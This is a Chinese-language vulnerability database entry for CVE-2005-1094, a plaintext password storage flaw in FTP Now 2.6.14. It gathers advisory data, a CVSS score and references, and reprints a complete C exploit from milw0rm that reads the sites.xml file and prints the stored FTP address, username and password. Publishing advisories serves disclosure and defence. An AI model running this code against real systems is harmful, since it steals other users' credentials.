CVE-2005-1094
CVSS4.6
发布时间 :2005-04-08 00:00:00
修订时间 :2008-09-05 16:48:11
NMCOES    

[原文]FTP Now 2.6.14 stores usernames and passwords in plaintext in sites.xml, which is world-readable, which allows local users to gain privileges.


[CNNVD]Network-Client FTP Now本地密码泄露漏洞(CNNVD-200504-009)

        FTP Now 是一套简单易懂的FTP Client端软件,虽然它本身并不具有强大的功能,但对于身为网络新手的朋友们来说却是个难得的入门工具。FTP Now并不像其它的FTP软件一般只着重于功能上的强大,相反的,他主要是强调操作上的便捷。
        FTP Now 2.6.14在sites.xml中以明文存储用户名和密码,且是全域可读的,本地用户可借此获取权限。

- CVSS (基础分值)

CVSS分值: 4.6 [中等(MEDIUM)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1094
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-1094
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200504-009
(官方数据源) CNNVD

- 其它链接及资源

http://xforce.iss.net/xforce/xfdb/20025
(VENDOR_ADVISORY)  XF  ftpnow-sites-information-disclosure(20025)
http://securitytracker.com/id?1013657
(VENDOR_ADVISORY)  SECTRACK  1013657
http://secunia.com/advisories/14889
(VENDOR_ADVISORY)  SECUNIA  14889
http://www.osvdb.org/15296
(UNKNOWN)  OSVDB  15296

- 漏洞信息

Network-Client FTP Now本地密码泄露漏洞
中危 设计错误
2005-04-08 00:00:00 2005-10-20 00:00:00
本地  
        FTP Now 是一套简单易懂的FTP Client端软件,虽然它本身并不具有强大的功能,但对于身为网络新手的朋友们来说却是个难得的入门工具。FTP Now并不像其它的FTP软件一般只着重于功能上的强大,相反的,他主要是强调操作上的便捷。
        FTP Now 2.6.14在sites.xml中以明文存储用户名和密码,且是全域可读的,本地用户可借此获取权限。

- 公告与补丁

        暂无数据

- 漏洞信息 (918)

FTP Now <= 2.6.14 Local Password Disclosure Exploit (EDBID:918)
windows local
2005-04-06 Verified
0 Kozan
N/A [点击下载]
/*******************************************************************

FTP Now v2.6.14 Local Password Disclosure Exploit by Kozan

Application: FTP Now v2.6.14 (and prior versions)
Vendor:www.network-client.com
Vulnerable Description: FTP Now v2.6.14 discloses passwords
to local users.

Discovered & Coded by: Kozan
Credits to ATmaCA
Web: www.netmagister.com
Web2: www.spyinstructors.com
Mail: kozan@netmagister.com

*******************************************************************/

#include <stdio.h>
#include <string.h>
#include <windows.h>

HKEY hKey;
#define BUFSIZE 100
char prgfiles[BUFSIZE];
DWORD dwBufLen=BUFSIZE;
LONG lRet;

int adresal(char *FilePath,char *Str)
{
       char kr;
       int Sayac=0;
       int Offset=-1;
       FILE *di;
       di=fopen(FilePath,"rb");

       if( di == NULL )
       {
               fclose(di);
               return -1;
       }

       while(!feof(di))
       {
               Sayac++;
               for(int i=0;i<strlen(Str);i++)
               {
                       kr=getc(di);
                       if(kr != Str[i])
                       {
                               if( i>0 )
                               {
                                       fseek(di,Sayac+1,SEEK_SET);
                               }
                               break;
                       }
                       if( i > ( strlen(Str)-2 ) )
                       {
                               Offset = ftell(di)-strlen(Str);
                               fclose(di);
                               return Offset;
                       }
               }
       }
       fclose(di);
       return -1;
}

char *oku(char *FilePath,char *Str)
{

       FILE *di;
       char cr;
       int i=0;
       char Feature[500];

       int Offset = adresal(FilePath,Str);

       if( Offset == -1 )
               return "";

       if( (di=fopen(FilePath,"rb")) == NULL )
               return "";

       fseek(di,Offset+strlen(Str),SEEK_SET);

       while(!feof(di))
       {
               cr=getc(di);
               if(cr == '<')
                       break;
               Feature[i] = cr;
               i++;
       }

       Feature[i] = '\0';
       fclose(di);
       return Feature;
}

int main()
{
       if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,
                   "SOFTWARE\\Microsoft\\Windows\\CurrentVersion",
                   0,
                   KEY_QUERY_VALUE,
                   &hKey) == ERROR_SUCCESS)
   {

               lRet = RegQueryValueEx( hKey, "ProgramFilesDir", NULL, NULL,
                                                      (LPBYTE) prgfiles, &dwBufLen);

       if( (lRet != ERROR_SUCCESS) || (dwBufLen > BUFSIZE) )
               {
                       RegCloseKey(hKey);
                       printf("An error occured!\n");
           exit(1);
       }

       RegCloseKey(hKey);

   }
       else
       {
       RegCloseKey(hKey);
               printf("An error occured!\n");
       exit(1);
   }

       strcat(prgfiles,"\\FTP Now\\sites.xml");

       printf("FTP Now <= v2.6.14 Local Exploit by Kozan\n");
       printf("Credits to ATmaCA\n");
       printf("www.netmagister.com  -  www.spyinstructors.com \n\n");
       printf("This exploit only show the first profile and its password.\n");
       printf("You may improve it freely...\n\n");

       char FtpAddress[BUFSIZE], FtpUsername[BUFSIZE], FtpPassword[BUFSIZE];

       strcpy(FtpAddress,oku(prgfiles,"<ADDRESS>"));
       strcpy(FtpUsername,oku(prgfiles,"<LOGIN>"));
       strcpy(FtpPassword,oku(prgfiles,"<PASSWORD>"));

       printf("Ftp Address   : %s\n",FtpAddress);
       printf("Ftp Username  : %s\n",FtpUsername);
       printf("Ftp Password  : %s\n",FtpPassword);

       return 0;
}

// milw0rm.com [2005-04-06]
		

- 漏洞信息

15296
FTP Now sites.xml Local Password Disclosure
Local Access Required Information Disclosure
Loss of Confidentiality
Exploit Public

- 漏洞描述

FTP Now contains a flaw that may lead to an unauthorized information disclosure. The issue is due to plaintext storage of sensitive information in the "Program Files\FTP Now\sites.xml" configuration file, which will disclose the account name and password to local users resulting in a loss of confidentiality.

- 时间线

2005-04-07 Unknow
2005-04-07 Unknow

- 解决方案

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- 相关参考

- 漏洞作者

- 漏洞信息

Network-Client FTP Now Local Password Disclosure Vulnerability
Design Error 13052
No Yes
2005-04-07 12:00:00 2009-07-12 12:56:00
Discovery is credited to Kozan <kozan@netmagister.com>.

- 受影响的程序版本

Network-Client FTP Now 2.6.14

- 漏洞讨论

FTP Now is reported prone to a vulnerability that can allow an attacker to disclose FTP passwords.

A local attacker can gain access to a file, which contains the credentials in plain text format.

The attacker may then use these credentials to access remote FTP servers and carry out other attacks.

FTP Now 2.6.14 is reported prone, however, it is possible that other versions are affected as well.

- 漏洞利用

An exploit is not required.

- 解决方案

Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com <mailto:vuldb@securityfocus.com>.

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站